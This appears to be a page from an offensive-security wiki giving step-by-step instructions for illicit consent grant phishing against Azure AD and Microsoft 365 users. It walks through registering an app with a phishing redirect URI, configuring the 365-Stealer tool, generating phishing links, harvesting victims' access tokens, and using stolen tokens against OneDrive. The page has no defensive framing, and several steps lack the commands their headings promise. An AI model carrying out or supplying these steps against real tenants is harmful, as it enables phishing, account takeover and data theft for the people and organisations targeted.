search
githubEdit

Illicit Consent Grant phishing

Illicit consent grant phishing involves tricking users into granting unauthorized access to applications, often by disguising malicious requests as legitimate consent requests.

Here are the steps and commands involved in executing this attack:

hashtag
1) Create an Application

Navigate to "Azure Active Directory" in the Azure portal.

Go to "App registrations" and click "New registration."

Set an application name and choose appropriate settings.

Use the URL of the phishing site in the redirect URI.

hashtag
2) Create Client Secret

Go to "Certificates & Secrets" and create a new client secret.

Copy the generated client secret.

hashtag
3) Add API Permissions

Go to "API permissions" and add permissions like 'user.read' and 'User.ReadBasic.All' for the Microsoft Graph.

hashtag
4) Check User Consent Permissions

Import-Module AzureADPreview.psd1

Use another tenant account

hashtag
5) Setup the 365-Stealer

Link: https://github.com/AlteredSecurity/365-Stealer

Copy the 365-stealer directory to the xampp directory.

Edit the 365-stealer.py and set the CLIENTID, REDIRECTEDURL, and CLIENTSECRET.

hashtag
6) Start the 365-Stealer

hashtag
7) Get the Phishing Link

Browse to https://localhost and click on "readmore." Copy the generated phishing link.

hashtag
8) Enumerate Applications for Phishing

Edit the permutations.txt file to add permutations

hashtag
9) Get the Access Tokens

Browse to http://localhost:82/365-Stealer/yourvictims/ and copy the access token from access_token.txt.

hashtag
10) Get Admin Consent

Grant admin consent for additional permissions required for the attack.

hashtag
11) Abuse the Access Token

Upload a Word document to OneDrive using the stolen access token.

hashtag
12) Refresh All Tokens

PreviousExecuting VM extensionsNextPass-the-PRT

Last updated